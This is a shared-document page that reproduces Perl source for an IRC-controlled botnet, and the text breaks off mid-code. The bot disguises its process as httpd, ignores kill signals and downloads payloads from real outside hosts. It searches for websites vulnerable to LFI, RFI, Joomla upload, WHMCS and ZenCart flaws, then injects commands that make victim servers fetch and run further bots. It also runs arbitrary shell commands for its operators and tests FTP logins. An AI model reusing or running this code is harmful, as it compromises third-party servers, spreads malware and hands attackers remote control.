Professional Documents
Culture Documents
Exploit Perl Bot Code for Scanning and Hacking Sites
Uploaded by
Winata Kl BelaOriginal Description:
Original Title
Copyright
Available Formats
Share this document
Did you find this document useful?
Is this content inappropriate?
Report this DocumentCopyright:
Available Formats
Exploit Perl Bot Code for Scanning and Hacking Sites
Uploaded by
Winata Kl BelaCopyright:
Available Formats
#!/usr/bin/perl use HTTP::Request; use HTTP::Request::Common; use HTTP::Request::Common qw(POST); use LWP::Simple; use LWP 5.
64; use LWP::UserAgent; use Socket; use IO::Socket; use IO::Socket::INET; use IO::Select; use MIME::Base64; use URI::Escape; use Digest::MD5 qw(md5_hex); #use DBI; #use DBD::mysql; my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my my $datetime $fakeproc $ircserver $ircport $nickname $ident $channel $chanxxx $chaninfo $submitchan $sqlchan = $admin $fullname $rawmsg $msgraw localtime; "/usr/sbin/httpd"; "visa666.suka.se"; "6667"; "ASU"; "bot"; "#pi"; = "#pi"; = "#pi"; = "#pi"; "#pi"; = "pool"; = "4,1ovd Sc-An.8TJCE"; = $ARGV[4]; = $ARGV[5]; = = = = = = =
$nob0dy = "3(6Nobody3) "; $whmcslogo = "3(6WHMCS3) "; $thumblogo = "4,1JCE0 BY: MGM "; $zerologo = "3(6zBoarD3) "; $lfilogo = "3(6LFI3) "; $rfilogo = "3(6RFI3) "; $xmllogo = "3(6XML3) "; $oscologo = "3(6OSCO3) "; $oscosqllogo = "3(6O-SQL3) "; $e107logo = "3(6E1073) "; $ihlogo = "3(6Is-Human3) "; $zenlogo = "12ZenCart3) "; $rfglogo = "3(6RFG3) "; $carilogo = "129Find3) "; $sqllogo = "3(6SQL3PegaL) "; $civicrmlogo = "3(CIVICRM3) "; $acylogo = "3(ACYMAILING3) "; $jnewsllogo = "3(JNEWSLETTER3) "; $jinclogo = "3(JINC3) "; $mailogo = "3(MAIANMEDIA3) "; $jnewslogo = "3(JNEWS3) "; $jnewlogo = "3(JNEW3) "; $whmcscmd = '!whmz'; $thumbcmd = "!jn"; $zerocmd = "!zero"; $lficmd = "!lfi";
my $rficmd = "!rfi"; my $xmlcmd = "!xml"; my $e107cmd = "!e107"; my $zencmd = ".zen"; my $ihcmd = "!ishu"; my $oscocmd = "!osc"; my $sqlcmd = "!sql"; my $cmdlfi = "!cmdlfi"; my $cmdxml = "!cmdxml"; my $cmde107 = "!cmde107"; my $rfgcmd = "!rfg"; my $ftpcmd = "!ftp"; my $civicrmcmd = "!civ"; my $acycmd = "!acy"; my $jnewslcmd = "!jn"; my $jinccmd = "!jin"; my $maicmd = "!mai"; my $jnewscmd = "!jnw"; my $jnewcmd = "!jne"; my $spreadMode = 1; my $zerowget = 1; my $zerolwp = 1; my $zerocurl = 1; my $gps = 1; my $gps2 = 1; my $timot = 10; my $silentmode = 1; my $thumbid = "http://picasa.com.my-corner.us/jahat.php"; my $thumbshell = "http://picasa.com.my-corner.us/jahat.php"; #my $hostinjector = "picasa.com.my-corner.us"; #my $thumbid = "http://".$hostinjector."/bad.php"; #my $botdid = "http://".$hostinjector."/bad.php"; #my $botxdid = "http://".$hostinjector."/bad.php"; #my $injec = "http://".$hostinjector."/bad.php"; #my $thumbshell = uri_escape($thumbid); #my $md5php = md5_hex($thumbid).".php"; #my $md5bot = md5_hex($botdid).".php"; #my $md5botx = md5_hex($botxdid).".php"; #my $botid = uri_escape($botdid); #my $botxid = uri_escape($botxdid); #my $injector = "http://flickr.com.timomentum.com.br/bad.txt?"; #my $botshell = "http://flickr.com.timomentum.com.br/bot.txt?"; #my $botshell1 = "http://picasa.com.jdautocentergyn.com.br/bad.txt?"; #my $subticket = "/submitticket.php?step=2&deptid=1"; my $action = "/data/shell.php"; my $wgetdon = "?cmd=wget http://".$hostinjector."/jack.php;wget http://biriq.com //wp-includes/perl.jpg;perl perl.jpg;rm -rf perl.jpg;wget http://picasa.com.jdau tocentergyn.com.br/rabot.txt;rm -rf rabot.txt"; my $lwpdon = "?cmd=lwp-download -a http://".$hostinjector."/jack.php;lwp-downloa d http://biriq.com//wp-includes/perl.jpg;perl perl.jpg;rm -rf perl.jpg;lwp-downl oad http://picasa.com.jdautocentergyn.com.br/bot.txt;php b.jpg;rm -rf bot.txt"; my $curldon = "?cmd=curl -O http://".$hostinjector."/jack.php;curl -O http://bir iq.com//wp-includes/perl.jpg;perl perl.jpg;rm -rf perl.jpg;curl -O http://picasa .com.jdautocentergyn.com.br/bot.txt;php bot.txt;rm -rf bot.txt"; my $uagent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko /20100115 Firefox/3.6"; my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../ ../../../proc/self/environ%0000"; my $iam = "/wp-content/themes/Linepress/cache/error.php?____pgfa=https%2 53A%252F%252Fwww.google.com%252Fsearch?q=";
#"/image s/default/index2.php?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; my $iam2 = "/wp-content/uploads/error.php?____pgfa=https%253A%252F%252Fww w.google.com%252Fsearch?q="; #"/wp-admin/includes/ind ex2.php?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; my $iam3 = "/wp-content/themes/folioway/cache/error.php?____pgfa=https%25 3A%252F%252Fwww.google.com%252Fsearch?q="; my $jpath = "/wp-includes/error.php?____pgfa=https%253A%252F%252Fwww.googl e.com%252Fsearch?q="; my $Indo1 = "http://hero.co.ke".$iam; my $Indo2 = "http://audiovideolife.com/wp-includes/class-mail.php?q=".$iam2; my $Indo3 = "http://www.zuquibraz.com.br/wp-includes/class-mail.php?____pgfa=".$ iam3; my $Indo4 = "http://www.zuquibraz.com.br/wp-includes/class-mail.php?____pgfa=".$ iam3; my $Indo5 = "http://audiovideolife.com/wp-includes/class-mail.php?q=".$iam2; my $Indo6 = "http://audiovideolife.com/wp-includes/class-mail.php?q=".$iam2; my $engine = "IndoAC,IndoAD,IndoAE,IndoAF,IndoAG,IndoAL,IndoAM,IndoAN,IndoA T,IndoAR,IndoAU,IndoBE,IndoBG,IndoBY,IndoHU,IndoOrG,IndoCoM,IndoNeT,IndoPL,IndoI T,IndoID,IndoMY, IndoES,IndoFI,IndoGOV,IndoHK,IndoHR,IndoIL,IndoL V,IndoMD,IndoNO,IndoNZ,IndoUK,IndoUS,IndoJP,IndoKR,IndoDE,IndoDK,IndoCA,IndoBR,I ndoRO,IndoRU,IndoNL,IndoInfO,IndoFR,IndoIN,IndoMX,IndoCZ,IndoCL,IndoCO,IndoCK,In doEC,IndoEDU,IndoEE,IndoGR,IndoUA, IndoCN,IndoIR,IndoTH,IndoEU,IndoPH,IndoPK,IndoPT ,IndoIL,IndoSE,IndoSG,IndoTK,IndoTR,IndoTV,IndoTW,IndoVN,IndoWS,IndoIM,IndoSI,In doZA,IndoBIZ,GooGLe,WaLLa,YaHoo,AsK,Bing,OnEt,CLusTy,SaPo,AoL,UoL,LyCos,HotBot,B igLobe,SeZNam"; $SIG{'INT'} = 'IGNORE'; $SIG{'HUP'} = 'IGNORE'; $SIG{'TERM'} = 'IGNORE'; $SIG{'CHLD'} = 'IGNORE'; $SIG{'PS'} = 'IGNORE'; chdir("/tmp"); chop (my $priper = `wget http://picasa.com.jdautocentergyn.com.br/bat.txt -O id. jpg;wget http://picasa.com.jdautocentergyn.com.br/bot.txt -O pahit.jpg;wget http ://biriq.com//wp-includes/tempe.gif -O mysql.jpg`); $ircserver = "$ARGV[0]" if $ARGV[0]; $ircport = "$ARGV[1]" if $ARGV[1]; $nickname = "$ARGV[2]" if $ARGV[2]; $channel = '#'."$ARGV[3]" if $ARGV[3]; $0 = "$fakeproc"."\0" x 16; my $pid = fork; exit if $pid; die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid); our %irc_servers; our %DCC; my $dcc_sel = new IO::Select->new(); $sel_client = IO::Select->new(); sub sendraw { if ($#_ == '1') { my $socket = $_[0]; print $socket "$_[1]\n"; } else { print $IRC_cur_socket "$_[0]\n"; } }
sub connector { my $mynick = $_[0]; my $ircserver_con = $_[1]; my $ircport_con = $_[2]; my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_c on", PeerPort=>$ircport_con) or return(1); if (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket; $IRC_socket->autoflush(1); $sel_client->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con"; $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con"; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost; nick("$mynick"); sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname "); sleep(1);}} sub parse { my $servarg = shift; if ($servarg =~ /^PING \:(.*)/) { sendraw("PONG :$1"); } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { if (lc($1) eq lc($mynick)) { $mynick = $4; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; } } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { nick($mynick.int(rand(5))); } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { $mynick = $2; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; sendraw("MODE $mynick +Bx"); sendraw("NS id qwe123"); sleep(3); sendraw("JOIN $channel correct"); sendraw("JOIN $chanxxx mejen"); sleep(1); sendraw("PRIVMSG $admin :Hi $admin im here !!!"); } } my $line_temp; while( 1 ) { while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircpo rt"); } select(undef, undef, undef, 0.01); delete($irc_servers{''}) if (defined($irc_servers{''})); my @ready = $sel_client->can_read(0); next unless(@ready); foreach $fh (@ready) { $IRC_cur_socket = $fh; $mynick = $irc_servers{$IRC_cur_socket}{'nick'}; $nread = sysread($fh, $ircmsg, 4096); if ($nread == 0) {
$sel_client->remove($fh); $fh->close; delete($irc_servers{$fh}); } @lines = split (/\n/, $ircmsg); $ircmsg =~ s/\r\n$//; if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5); if ($path eq $mynick) { if ($msg =~ /^PING (.*)/) { sendraw("NOTICE $nick :PING $1"); } if ($msg =~ /^VERSION/) { sendraw("NOTICE $nick :VERSION mIRC v6.21 Khaled Mardam-Bey"); } if ($msg =~ /^TIME/) { sendraw("NOTICE $nick :TIME ".$datetime."" ); } if (&isAdmin($nick) && $msg eq "!die") { &shell("$path","kill -9 $$"); } if (&isAdmin($nick) && $msg eq "!killall") { &shell("$path","killall -9 perl"); } if (&isAdmin($nick) && $msg eq "!reset") { sendraw("QUIT :Restarting..."); } if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) { sendraw("JOIN #".$1); } if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) { sendraw("PART #".$1); } if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) { sendraw("NICK ".$1); } if (&isAdmin($nick) && $msg =~ /^!pid/) { sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$"); } if (&isAdmin($nick) && $msg !~ /^!/) { &shell("$nick","$msg"); } if (&isAdmin($nick) && $msg =~ /^!raw (.+)/) { sendraw("$rawmsg $msgraw ".$1); } if (&isAdmin($nick) && $msg =~ /^!say (.+)/) { sendraw("PRIVMSG $rawmsg ".$1); } if (&isAdmin($nick) && $msg =~ /^!act (.+)/) { sendraw("PRIVMSG $rawmsg :ACTION ".$1.""); } if (&isAdmin($nick) && $msg =~ /^!chtcmd\s+(.*) -d/) { if (my $pid = fork) { waitpid($pid, 0);
} else { if (fork) { exit; } else { $newthumbcmd = $1; $thumbcmd = $newthumbcmd; &msg("$admin","$thumblogo12 Scan Command change to4 $thumbcmd "); }}} if (&isAdmin($nick) && $msg =~ /^!chzcmd\s+(.*) -d/) { $newzerocmd = $1; $zerocmd = $newzerocmd; &msg("$admin","$zerologo12 Scan Command c hange to4 $zerocmd "); } if (&isAdmin($nick) && $msg =~ /^!chwcmd\s+(.*) -d/) { $newwhmcscmd = $1; $whmcscmd = $newwhmcscmd; &msg("$admin","$whmcslogo12 Scan Command change to4 $whmcscmd "); } if (&isAdmin($nick) && $msg =~ /^!timot\s+(.*) d/) { $newtimot = $1; $timot = $newtimot; &msg("$admin","12 Get Content TimeOut cha nge to4 $timot "); } if (&isAdmin($nick) && $msg =~ /^!chxchan\s+(.+) -d/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { $newchan = $1; $chanxxx = $newchan; &msg("$admin","12 xChan change to4 $chanxx x "); }}} } else { if (&isAdmin($nick) && $msg eq "!die") { &shell("$path","kill -9 $$"); } if (&isAdmin($nick) && $msg eq "!killall") { &shell("$path","killall -9 perl"); } if (&isAdmin($nick) && $msg eq "!reset") { sendraw("QUIT :Restarting..."); } if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) { sendraw("JOIN #".$1); } if (&isAdmin($nick) && $msg eq "!part") { sendraw("PART $path"); } if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) { sendraw("PART #".$1); } if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) { &shell("$path","$1");
} if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) { &shell("$path","$1"); } if ($msg=~ /^!silent\s+(.*) -d/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { $smod = $1; if ($smod =~ /ON/) { $silentmode = 1; $silentsta t = "ON"; } elsif ($smod =~ /OFF/) { $silentmode = 0; $silen tstat = "OFF"; } &msg("$path","12Silent Mode15 $silentstat !!!!"); }}} if ($msg=~ /^!Indox\s+(.*) -d/) { $engmod = $1; if ($engmod =~ /ON/) { $gps = 1; $gpsstat = "ACT IVATED"; } elsif ($engmod =~ /OFF/) { $gps = 0; $gpsstat = "DEACTIVATED"; } &msg("$path","12Indo Engine15 $gpsstat !!! !"); } if ($msg=~ /^!engine\s+(.*) -d/) { $engmod = $1; if ($engmod =~ /ON/) { $gps2 = 1; $gpsstat = "AC TIVATED"; } elsif ($engmod =~ /OFF/) { $gps2 = 0; $gpsstat = "DEACTIVATED"; } &msg("$path","12Multi Engine15 $gpsstat !! !!"); } if (&isAdmin($nick) && $msg =~ /^!injector\s+(.* ) -d/) { $newhostinjector= $1; $hostinjector = $newhostinjector; &msg("$path","12Injector 15change to4 $host injector "); } if ($msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){ my $url = $1.$lfdtest; my $cmd = $2; &cmdlfi($url,$cmd,$path); } if ($msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){ my $url = $1; my $cmd = $2; &cmdxml($url,$cmd,$path); } if ($msg=~ /^$cmde107\s+(.*?)\s+(.*)/){ my $url = $1; my $cmd = $2; &cmde107($url,$cmd,$path); } ################################################################ ##### HELP COMMAND if ($msg=~ /^!help/) {
my $helplogo = "4,1Help ";sleep(3); &msg("$path","$helplogo0JCEboard :15 $thum bcmd [bug] [dork] "); &msg("$path","$helplogo0RFG :15 $rfgcmd [b ug] [dork] "); &msg("$path","$helplogo0RFI :15 $rficmd [b ug] [dork] "); &msg("$path","$helplogo0LFI :15 $lficmd [b ug] [dork] "); &msg("$path","$helplogo0XML :15 $xmlcmd [b ug] [dork] "); &msg("$path","$helplogo0e107 :15 $e107cmd [dork] "); &msg("$path","$helplogo0WHMCS :15 $whmcscm d [dork] "); &msg("$path","$helplogo0ZeroBoard :15 $zer ocmd [dork] "); &msg("$path","$helplogo0osCommerce :15 $os cocmd [dork] "); &msg("$path","$helplogo0ZenCart :15 $zencm d [dork] "); &msg("$path","$helplogo0CIVICRM :15 $civic rmcmd [dork] "); &msg("$path","$helplogo0ACYMAILING :15 $ac ycmd [dork] "); &msg("$path","$helplogo0JNEWSLETTER :15 $j newslcmd [dork] "); &msg("$path","$helplogo0JINC :15 $jinccmd [dork] "); &msg("$path","$helplogo0MAIANMEDIA :15 $ma icmd [dork] "); &msg("$path","$helplogo0JNEWS :15 $jnewscm d [dork] "); &msg("$path","$helplogo0JNEW :15 $jnewcmd [dork] "); } if (&isAdmin($nick) && $msg =~ /^!pid/) { &msg("$nick","6Fake Process/PID : $fakeproc - $$"); } if ($msg=~ /^!respon/ || $msg=~ /^!id/) { if (&isFound($thumbid,"GIF89")) { &msg("$path","9,1Injector13 Pronto - Ready....!!! "); } else { &msg("$path","9,1Injector4 Falhou - Lost!!! "); } } if ($msg=~/^!bypass/){ if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $bystats1 = "";my $bystats2 = "";my $ bystats3 = "";my $bystats4 = "";my $bystats5 = ""; my $cekby1 = &get_content($Indo1."byroe" ); if ($cekby1 =~ /byroe\.net/i){ $bystats1 = "9Up!!!"; } else { $bystats1 = "4Lost!!!"; } my $cekby2 = &get_content($Indo2."byroe" ); if ($cekby2 =~ /byroe\.net/i){ $bystats2 = "9Up!!!"; } else { $bystats2 = "4Lost!!!"; } my $cekby3 = &get_content($Indo3."byroe"
); if ($cekby3 =~ /byroe\.net/i){ $bystats3 = "9Up!!!"; } else { $bystats3 = "4Lost!!!"; } my $cekby4 = &get_content($Indo4."byroe" ); if ($cekby4 =~ /byroe\.net/i){ $bystats4 = "9Up!!!"; } else { $bystats4 = "4Lost!!!"; } my $cekby5 = &get_content($Indo5."byroe" ); if ($cekby5 =~ /byroe\.net/i){ $bystats5 = "9Up!!!"; } else { $bystats5 = "4Lost!!!"; } my $cekby6 = &get_content($Indo6."byroe" ); if ($cekby6 =~ /byroe\.net/i){ $bystats6 = "9Up!!!"; } else { $bystats6 = "4Lost!!!"; } &msg("$path","9i'm here without bypass br other....") }}} ################################################################ ##### SCAN if ($msg =~ /!cari\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $find = $1; &msg($path,"$carilogo12 Searching 15$find "); &cari($path,$find); } exit; } } if ($msg =~ /^$oscocmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $dork = $1; my $simpan = 'situs.txt'; if (&isFound($thumbid,"GIF89")) { &msg("$chanxxx","12$nick 1 5lagi scan Oscommerce di 4$path "); &msg("$path","$oscologo12 Dork :15 $dork "); &msg("$path","$oscologo12 Search Engine15 Loading "); &se_start($path,"apalah" ,$simpan,$dork,$engine,9); } else { &msg("$path","12Injector4 Lost!!! "); exit; } } } } if ($msg =~ /^$lficmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ($1,$2); my $simpan = 'situs.txt'; if (&isFound($thumbid,"GIF89")) { &msg("$chanxxx","12$nick 1 5lagi scan LFI di 4$path ");
&msg("$path","$lfilogo12D ork :15 $dork "); &msg("$path","$lfilogo12B ugz :15 $bug "); &msg("$path","$lfilogo12S earch Engine15 Loading "); &se_start($path,$bug,$si mpan,$dork,$engine,3); } else { &msg("$path","12Injector4 Lost!!! "); exit; } } } } if ($msg =~ /^$rficmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ($1,$2); my $simpan = 'situs.txt'; if (&isFound($thumbid,"GIF89")) { &msg("$chanxxx","12$nick 1 5lagi scan RFI di 4$path "); &msg("$path","$rfilogo12D ork :15 $dork "); &msg("$path","$rfilogo12B ugz :15 $bug "); &msg("$path","$rfilogo12S earch Engine15 Loading "); &se_start($path,$bug,$si mpan,$dork,$engine,5); } else { &msg("$path","12Injector4 Lost!!!"); exit; } } } } if ($msg =~ /^$xmlcmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ($1,$2); my $simpan = 'situs.txt'; &msg("$chanxxx","12,1$nic k 15lagi scan XML di 4$path "); &msg("$path","$xmllogo12D ork :15 $dork "); &msg("$path","$xmllogo12B ugz :15 $bug "); &msg("$path","$xmllogo12S earch Engine15 Loading "); &se_start($path,$bug,$si mpan,$dork,$engine,6); } } } if ($msg =~ /^$thumbcmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my ($bug,$dork) = ("administrator/compon ents/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.ph p",$1); my $simpan = 'situs.txt'; if ($bug =~ m/^\//){ &msg("$path ","12Bug Dilarang Pakek \/ di depan :p "); exit; } else { if (&isFound($thumbid,"GIF89")) { &msg("$chanxxx","0,1$nick 4,1Disparou Scan Don't Flood - No floodar Canal 4$path "); &msg("$path","$thumblogo1 2Dork :4 $dork "); &msg("$path","$thumblogo1 2Bugz :0 $bug "); &msg("$path","$thumblogo0 Search Engine4 Loading... "); &se_start($path,$bug,$si mpan,$dork,$engine,1); } else { &msg("$path","12Injector4 Lost!!!"); exit; } } } } } if ($msg =~ /^$whmcscmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { my ($bug,$dork) = ("cart.php?a=b yroe&templatefile=",$1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan WHMCS di 4$path "); &msg("$path","$whmcslogo1 2Dork :15 $dork "); &msg("$path","$whmcslogo1 2Search Engine15 Loading "); &se_start($path,$bug,$si mpan,$dork,$engine,2); } } } if ($msg =~ /^$zerocmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { if (&isFound($thumbid,"GIF89")) { my ($bug,$dork) = ("zboard.php?i d=byroe",$1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan zboard di 4$path "); &msg("$path","$zerologo12 Dork :15 $dork "); &msg("$path","$zerologo12 Search Engine15 Loading "); &se_start($path,$bug,$si mpan,$dork,$engine,4); } else { &msg("$path","12Injector4
Lost!!!"); } } } } if ($msg =~ /^$e107cmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { if (&isFound($thumbid,"GIF89")) { my ($bug,$dork) = ("contact.php" ,$1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan E107 di 4$path "); &msg("$path","$e107logo12 Dork :15 $dork "); &msg("$path","$e107logo12 Search Engine15 Loading "); &se_start($path,$bug,$si mpan,$dork,$engine,7); } else { &msg("$path","12Injector4 Lost!!!"); } } } } if ($msg =~ /^$ihcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { if (&isFound($thumbid,"GIF89")) { my ($bug,$dork) = ("wp-content/p lugins/is-human/engine.php",$1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan Is-Human di 4$path "); &msg("$path","$ihlogo12Do rk :15 $dork "); &msg("$path","$ihlogo12Se arch Engine15 Loading "); &se_start($path,$bug,$si mpan,$dork,$engine,8); } else { &msg("$path","12Injector4 Lost!!!"); } } } } if ($msg =~ /^$zencmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { my ($bug,$dork) = ("admin/sqlpat ch.php/password_forgotten.php?action=execute",$1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 15lagi sc an ZenCart di 4$path "); &msg("$path","$zenlogo12Dork :15 $
dork "); &msg("$path","$zenlogo12Search En gine15 Loading "); &se_start($path,$bug,$simpan,$do rk,$engine,10); } } } if ($msg =~ /^$rfgcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("apalah",$1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 15lagi sc an RFG di 4$path "); &msg("$path","$rfglogo12Dork :15 $ dork "); &msg("$path","$rfglogo12Search En gine15 Loading "); &se_start($path,$bug,$simpan,$do rk,$engine,11); } } } if ($msg =~ /^$sqlcmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ($1,$2); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan SQL di 4$path "); &msg("$path","$sqllogo12D ork :15 $dork "); &msg("$path","$sqllogo12B ugz :15 $bug "); &msg("$path","$sqllogo12S earch Engine15 Loading "); &se_start($path,$bug,$si mpan,$dork,$engine,12); } } } if ($msg =~ /^$civicrmcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { my ($bug,$dork) = ("administrato r/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upl oad_image.php",$1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan CIVICRM di 4$path "); &msg("$path","$civicrmlo go12Dork :15 $dork "); &msg("$path","$civicrmlo go12Bugz :15 $bug "); &msg("$path","$civicrmlo go12Search Engine15 Loading "); sendraw("MODE $path +m"); &se_start($path,$bug,$si mpan,$dork,$engine,13);
} } } if ($msg =~ /^$acycmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { my ($bug,$dork) = ("administrato r/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php", $1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan ACYMAILING di 4$path "); &msg("$path","$acylogo12D ork :15 $dork "); &msg("$path","$acylogo12B ugz :15 $bug "); &msg("$path","$acylogo12S earch Engine15 Loading "); sendraw("MODE $path +m"); &se_start($path,$bug,$si mpan,$dork,$engine,14); } } } if ($msg =~ /^$jnewslcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { my ($bug,$dork) = ("administrato r/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_ image.php",$1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan JNEWSLETTER di 4$path "); &msg("$path","$jnewsllog o12Dork :15 $dork "); &msg("$path","$jnewsllog o12Bugz :15 $bug "); &msg("$path","$jnewsllog o12Search Engine15 Loading "); sendraw("MODE $path +m"); &se_start($path,$bug,$si mpan,$dork,$engine,15); } } } if ($msg =~ /^$jinccmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { my ($bug,$dork) = ("administrato r/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php",$1) ; my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan JINC di 4$path "); &msg("$path","$jinclogo12 Dork :15 $dork "); &msg("$path","$jinclogo12 Bugz :15 $bug "); &msg("$path","$jinclogo12 Search Engine15 Loading ");
sendraw("MODE $path +m"); &se_start($path,$bug,$si mpan,$dork,$engine,16); } } } if ($msg =~ /^$maicmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { my ($bug,$dork) = ("administrato r/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.ph p",$1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan MAIANMEDIA di 4$path "); &msg("$path","$mailogo12D ork :15 $dork "); &msg("$path","$mailogo12B ugz :15 $bug "); &msg("$path","$mailogo12S earch Engine15 Loading "); sendraw("MODE $path +m"); &se_start($path,$bug,$si mpan,$dork,$engine,17); } } } if ($msg =~ /^$jnewscmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { my ($bug,$dork) = ("administrato r/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image. php",$1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan JNEWS di 4$path "); &msg("$path","$jnewslogo1 2Dork :15 $dork "); &msg("$path","$jnewslogo1 2Bugz :15 $bug "); &msg("$path","$jnewslogo1 2Search Engine15 Loading "); sendraw("MODE $path +m"); &se_start($path,$bug,$si mpan,$dork,$engine,18); } } } if ($msg =~ /^$jnewcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { my ($bug,$dork) = ("components/c om_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php",$1); my $simpan = 'situs.txt'; &msg("$chanxxx","12$nick 1 5lagi scan JNEW di 4$path "); &msg("$path","$jnewlogo12 Dork :15 $dork "); &msg("$path","$jnewlogo12 Bugz :15 $bug ");
&msg("$path","$jnewlogo12 Search Engine15 Loading "); sendraw("MODE $path +m"); &se_start($path,$bug,$si mpan,$dork,$engine,19); } } } if my my my my ($msg =~ /^$ftpcmd\s+(.+?)\s+(.*)\s+(.*)/) { $url = $_[0]; $host = $_[1]; $user = $_[2]; $pass = $_[3]; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($host,$user,$pass) = ($1,$2,$3); &msg("$path","12FTP15 Checking $host | $us er:$pass"); my $success = 1; use Net::FTP; my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 5); $success = 0 if $ftp->login($user,$pass) ; $ftp->quit; if ($success == 0) { ¬ice("$nick","12[6FTP12] [ 6http: //".$host." 12] [".$user.":".$pass."12] 9Success "); } else { ¬ice("$nick","12[6FTP12] [ 6http: //".$host." 12] [".$user.":".$pass."12] 4Denied "); } } } } } } for(my $c=0; $c<= $#lines; $c++) { $line = $lines[$c]; $line = $line_temp.$line if ($line_temp); $line_temp = ''; $line =~ s/\r$//; unless ($c == $#lines) { parse("$line"); } else { if ($#lines == 0) { parse("$line"); } elsif ($lines[$c] =~ /\r$/) { parse("$line"); } elsif ($line =~ /^(\S+) 